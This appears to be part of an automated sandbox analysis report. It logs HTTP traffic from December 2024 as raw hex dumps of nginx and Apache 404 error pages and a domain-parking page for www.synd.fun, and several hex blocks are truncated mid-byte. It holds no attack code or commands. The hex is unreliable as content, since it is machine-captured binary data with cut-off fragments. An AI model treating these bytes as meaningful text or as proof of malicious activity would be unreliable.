4b 8e 92 d0 76 e3 18 a4 a7 f3 3d b0 9f 8f de 96 e0 27 0c 6c fc 5b 5f 2d 09 92 1b c4 34 90 5d e5 5c b1 78 60 b3 1e bb 91 37 4c 9a ce 99 fa e9 cd 37 2e be 76 e9 b5 cd 33 ce a9 5d 2f e8 84 bb 76 12 49 b7 bf c1 03 de 0a 65 47 34 04 78 76 13 2f 0c 2a d5 6b 7b 6b a7 9c 33 5b 5b cd 33 4e dd c9 88 64 c4 44 18 f8 18 de 28 2d 26 53 29 3b 03 19 78 db 2a 4e ec cb 71 b9 5a c2 78 15 45 61 f4 94 13 6a 62 15 73 e2 c8 6d 94 4c 42 d0 46 ae dd 51 b2 cd da 7d 66 be c8 54 a0 30 92 48 fc d4 bc cd 4f 32 f9 9b eb 3b 89 47 47 db 69 3b ec 8c 73 8b 6e 5b 43 e8 4a e8 af 16 a9 af 95 59 29 b7 b1 bd 4e 9f 5a ed 6e cb f7 ba bd 04 f6 40 b4 54 64 d2 e1 c1 ad 56 d6 41 24 67 5a 34 f5 cc d6 3b de ce d2 a9 56 10 26 c4 52 a2 ae 60 a1 f4 eb f4 28 7d 94 1e a4 8f 45 fa 5d ba 3f f9 10 8f f7 d2 c3 c9 47 93 1b 78 3e c4 df 51 7a 37 dd a7 ee bb 2b 41 3b 1e ae d5 e1 85 da 5f db 16 59 6d 6e ab bd 24 19 c6 17 1c 07 4e 67 c3 6d b5 33 04 e1 76 e8 fb e1 ae 08 c2 70 a8 60 25 78 80 1f c0 5a 54 04 7b 96 51 97 9c b9 d5 86 b7 f7 c1 cc 5f 69 75 7b f2 e1 e4 66 dd 91 cd ba 83 7d 34 eb 73 9b e9 aa 56 2b f3 70 6b 37 92 c3 21 88 66 02 9e 6f 6f b1 2f b6 e0 0b 80 83 a5 83 58 2d bd 30 4e 00 1e 56 9c c8 c4 73 a1 80 b9 55 67 64 6d 65 eb 93 9e 56 a7 d2 98 d3 88 c5 d0 50 9a c3 8b de 6a b3 3e 5c 3e a7 a3 b4 f5 c2 45 9f 5d 47 f5 76 d4 4c 0f b5 9a d2 1f 48 7f e9 0f ac d3 07 c7 b4 38 23 ea e1 b2 ed b6 47 49 12 06 71 2e 67 ec d7 50 be ee 04 97 fa 01 c2 f7 c3 a8 c5 da 55 81 4b 26 96 75 c4 de 55 d5 82 de 07 d2 67 25 64 b2 2c e6 17 72 cb c6 b3 42 80 c1 06 89 a1 ec 74 a0 9e 96 4f 16 33 6f 71 04 c8 da ea 9c dd 5e e8 c5 ce ba db 53 6e bf b1 d2 e1 c0 60 e2 f5 8a 1c 0c d7 30 b6 15 87 a3 c8 55 8d 7c 69 42 e2 52 f3 37 34 9b 2c 4f 98 fb 24 47 31 f9 66 a8 36 fc ef e4 7d 74 c2 81 f4 0a 40 cf 9d c4 60 59 0f 70 02 b5 eb ac 8f 92 41 ce d9 0c d7 d4 4e b1 64 34 c8 39 5e a1 26 17 bb 91 5e 37 68 c4 10 4c d0 69 81 c6 c9 1b 4c ff 0e 43 f8 4f 7a 20 26 9f a4 47 93 4f 27 37 45 7a 3f f7 ff d3 86 cb c5 43 19 2c b0 d1 61 14 0e 42 8
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Dec 2024 08:40:50 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 64 39 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 5b 6f 1b c7 15 7e f7 af 18 b3 80 48 da dc dd 28 29 02 db 22 a9 26 71 fa 94 4b 01 39 2d 0a 45 21 86 cb 11 b9 e6 72 97 dd 5d 4a a6 6d 01 89 9d 34 09 62 c4 68 1a a0 40 d0 a0 37 14 7d 2a 20 5f d4 28 be 28 7f 61 f9 8f fa 9d 33 bb cb 21 45 ca b7 a4 28 01 89 cb b9 9c 39 73 2e df 39 67 66 eb a7 3b a1 9b 8c 87 4a f4 92 81 df ac d3 7f e1 fa 32 8e 1b 25 2f 6e c9 8e 1c 26 de 8e 2a 09 5f 06 dd 46 29 1a 95 30 46 c9 4e b3 3e 50 89 14 6e 4f 46 b1 4a 1a a5 f7 2e fd d2 3a 87 3e 6e 0d e4 40 35 4a 43 19 f5 bd a0 5b 12 6e 18 24 2a c0 a0 48 75 a3 91 15 81 e6 ec c8 1d 4f ed 0e c3 28 31 86 ee 7a 9d a4 d7 e8 a8 1d cf 55 16 ff a8 79 81 97 78 d2 b7 62 57 fa aa b1 0a 12 89 97 f8 aa b9 bb bb 6b c7 e3 a0 63 6f 8f 82 ba a3 db ea be 17 f4 45 a4 fc 46 29 4e c6 be 8a 7b 4a 81 fc 40 75 3c d9 28 49 df 2f 89 5e a4 b6 0b 26 99 29 4b 8e 92 d0 76 e3 18 a4 a7 f3 3d b0 9f 8f de 96 e0 27 0c 6c fc 5b 5f 2d 09 92 1b c4 34 90 5d e5 5c b1 78 60 b3 1e bb 91 37 4c 9a ce 99 fa e9 cd 37 2e be 76 e9 b5 cd 33 ce a9 5d 2f e8 84 bb 76 12 49 b7 bf c1 03 de 0a 65 47 34 04 78 76 13 2f 0c 2a d5 6b 7b 6b a7 9c 33 5b 5b cd 33 4e dd c9 88 64 c4 44 18 f8 18 de 28 2d 26 53 29 3b 03 19 78 db 2a 4e ec cb 71 b9 5a c2 78 15 45 61 f4 94 13 6a 62 15 73 e2 c8 6d 94 4c 42 d0 46 ae dd 51 b2 cd da 7d 66 be c8 54 a0 30 92 48 fc d4 bc cd 4f 32 f9 9b eb 3b 89 47 47 db 69 3b ec 8c 73 8b 6e 5b 43 e8 4a e8 af 16 a9 af 95 59 29 b7 b1 bd 4e 9f 5a ed 6e cb f7 ba bd 04 f6 40 b4 54 64 d2 e1 c1 ad 56 d6 41 24 67 5a 34 f5 cc d6 3b de ce d2 a9 56 10 26 c4 52 a2 ae 60 a1 f4 eb f4 28 7d 94 1e a4 8f 45 fa 5d ba 3f f9 10 8f f7 d2 c3 c9 47 93 1b 78 3e c4 df 51 7a 37 dd a7 ee bb 2b 41 3b 1e ae d5 e1 85 da 5f db 16 59 6d 6e ab bd 24 19 c6 17 1c 07 4e 67 c3 6d b5 33 04 e1 76 e8 fb e1 ae 08 c2 70 a8 60 25 78 80 1f c0 5a 54 04 7b 96 51 97 9c b9 d5 86 b7 f7 c1 cc 5f 69 75 7b f2 e1 e4 66 dd 91 cd ba 83 7d 34 eb 73 9b e9 aa 56 2b f3 70 6b 37 92 c3 21 88 66 02 9e 6f 6f b1 2f b6 e0 0b 80 83 a5 83 58 2d bd 30 4e 00 1e 56 9c c8 c4 73 a1 80 b9 55 67 64 6d 65 eb 93 9e 56 a7 d2 98 d3 88 c5 d0 50 9a c3 8b de 6a b3 3e 5c 3e a7 a3 b4 f5 c2 45 9f 5d 47 f5 76 d4 4c 0f b5 9a d2 1f 48 7f e9 0f ac d3 07 c7 b4 38 23 ea e1 b2 ed b6 47 49 12 06 71 2e 67 ec d7 50 be ee 04 97 fa 01 c2 f7 c3 a8 c5 da 55 81 4b 26 96 75 c4 de 55 d5 82 de 07 d2 67 25 64 b2 2c e6 17 72 cb c6 b3 42 80 c1 06 89 a1 ec 74 a0 9e 96 4f 16 33 6f 71 04 c8 da ea 9c dd 5e e8 c5 ce ba db 53 6e bf b1 d2 e1 c0 60 e2 f5 8a 1c 0c d7 30 b6 15 87 a3 c8 55 8d 7c 69 42 e2 52 f3 37 34 9b 2c 4f 98 fb 24 47 31 f9 66 a8 36 fc ef e4 7d 74 c2 81 f4 0a 40 cf 9d c4 60 59 0f 70 02 b5 eb ac 8f 92 41 ce d9 0c d7 d4 4e b1 64 34 c8 39 5e a1 26 17 bb 91 5e 37 68 c4 10 4c d0 69 81 c6 c9 1b 4c ff 0e 43 f8 4f 7a 20 26 9f a4 47 93 4f 27 37 45 7a 3f f7 ff d3 86 cb c5 43 19 2c b0 d1 61 14 0e 42 8
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Dec 2024 08:40:52 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 64 39 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 5b 6f 1b c7 15 7e f7 af 18 b3 80 48 da dc dd 28 29 02 db 22 a9 26 71 fa 94 4b 01 39 2d 0a 45 21 86 cb 11 b9 e6 72 97 dd 5d 4a a6 6d 01 89 9d 34 09 62 c4 68 1a a0 40 d0 a0 37 14 7d 2a 20 5f d4 28 be 28 7f 61 f9 8f fa 9d 33 bb cb 21 45 ca b7 a4 28 01 89 cb b9 9c 39 73 2e df 39 67 66 eb a7 3b a1 9b 8c 87 4a f4 92 81 df ac d3 7f e1 fa 32 8e 1b 25 2f 6e c9 8e 1c 26 de 8e 2a 09 5f 06 dd 46 29 1a 95 30 46 c9 4e b3 3e 50 89 14 6e 4f 46 b1 4a 1a a5 f7 2e fd d2 3a 87 3e 6e 0d e4 40 35 4a 43 19 f5 bd a0 5b 12 6e 18 24 2a c0 a0 48 75 a3 91 15 81 e6 ec c8 1d 4f ed 0e c3 28 31 86 ee 7a 9d a4 d7 e8 a8 1d cf 55 16 ff a8 79 81 97 78 d2 b7 62 57 fa aa b1 0a 12 89 97 f8 aa b9 bb bb 6b c7 e3 a0 63 6f 8f 82 ba a3 db ea be 17 f4 45 a4 fc 46 29 4e c6 be 8a 7b 4a 81 fc 40 75 3c d9 28 49 df 2f 89 5e a4 b6 0b 26 99 29 4b 8e 92 d0 76 e3 18 a4 a7 f3 3d b0 9f 8f de 96 e0 27 0c 6c fc 5b 5f 2d 09 92 1b c4 34 90 5d e5 5c b1 78 60 b3 1e bb 91 37 4c 9a ce 99 fa e9 cd 37 2e be 76 e9 b5 cd 33 ce a9 5d 2f e8 84 bb 76 12 49 b7 bf c1 03 de 0a 65 47 34 04 78 76 13 2f 0c 2a d5 6b 7b 6b a7 9c 33 5b 5b cd 33 4e dd c9 88 64 c4 44 18 f8 18 de 28 2d 26 53 29 3b 03 19 78 db 2a 4e ec cb 71 b9 5a c2 78 15 45 61 f4 94 13 6a 62 15 73 e2 c8 6d 94 4c 42 d0 46 ae dd 51 b2 cd da 7d 66 be c8 54 a0 30 92 48 fc d4 bc cd 4f 32 f9 9b eb 3b 89 47 47 db 69 3b ec 8c 73 8b 6e 5b 43 e8 4a e8 af 16 a9 af 95 59 29 b7 b1 bd 4e 9f 5a ed 6e cb f7 ba bd 04 f6 40 b4 54 64 d2 e1 c1 ad 56 d6 41 24 67 5a 34 f5 cc d6 3b de ce d2 a9 56 10 26 c4 52 a2 ae 60 a1 f4 eb f4 28 7d 94 1e a4 8f 45 fa 5d ba 3f f9 10 8f f7 d2 c3 c9 47 93 1b 78 3e c4 df 51 7a 37 dd a7 ee bb 2b 41 3b 1e ae d5 e1 85 da 5f db 16 59 6d 6e ab bd 24 19 c6 17 1c 07 4e 67 c3 6d b5 33 04 e1 76 e8 fb e1 ae 08 c2 70 a8 60 25 78 80 1f c0 5a 54 04 7b 96 51 97 9c b9 d5 86 b7 f7 c1 cc 5f 69 75 7b f2 e1 e4 66 dd 91 cd ba 83 7d 34 eb 73 9b e9 aa 56 2b f3 70 6b 37 92 c3 21 88 66 02 9e 6f 6f b1 2f b6 e0 0b 80 83 a5 83 58 2d bd 30 4e 00 1e 56 9c c8 c4 73 a1 80 b9 55 67 64 6d 65 eb 93 9e 56 a7 d2 98 d3 88 c5 d0 50 9a c3 8b de 6a b3 3e 5c 3e a7 a3 b4 f5 c2 45 9f 5d 47 f5 76 d4 4c 0f b5 9a d2 1f 48 7f e9 0f ac d3 07 c7 b4 38 23 ea e1 b2 ed b6 47 49 12 06 71 2e 67 ec d7 50 be ee 04 97 fa 01 c2 f7 c3 a8 c5 da 55 81 4b 26 96 75 c4 de 55 d5 82 de 07 d2 67 25 64 b2 2c e6 17 72 cb c6 b3 42 80 c1 06 89 a1 ec 74 a0 9e 96 4f 16 33 6f 71 04 c8 da ea 9c dd 5e e8 c5 ce ba db 53 6e bf b1 d2 e1 c0 60 e2 f5 8a 1c 0c d7 30 b6 15 87 a3 c8 55 8d 7c 69 42 e2 52 f3 37 34 9b 2c 4f 98 fb 24 47 31 f9 66 a8 36 fc ef e4 7d 74 c2 81 f4 0a 40 cf 9d c4 60 59 0f 70 02 b5 eb ac 8f 92 41 ce d9 0c d7 d4 4e b1 64 34 c8 39 5e a1 26 17 bb 91 5e 37 68 c4 10 4c d0 69 81 c6 c9 1b 4c ff 0e 43 f8 4f 7a 20 26 9f a4 47 93 4f 27 37 45 7a 3f f7 ff d3 86 cb c5 43 19 2c b0 d1 61 14 0e 42 8
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Dec 2024 08:40:55 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeData Raw: 32 36 35 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 73 79 6e 64 2e 66 75 6e 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 3c 73 63 72 69 70 74 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 0a 2f 2a 5d 5d 3e 2a 2f 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 20 62 2d 70 61 67 65 5f 74 79 70 65 5f 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 5f 62 67 5f 6c 69 67 68 74 22 3e 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 5f 74 79 70 65 5f 72 64 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 6e 6f 74 65 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b5 d0 b3 d0 b8 d1 81 d1 82 d1 80 d
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Dec 2024 08:41:02 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Dec 2024 08:41:05 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Dec 2024 08:41:08 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Dec 2024 08:41:10 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Dec 2024 08:42:38 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Dec 2024 08:42:40 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 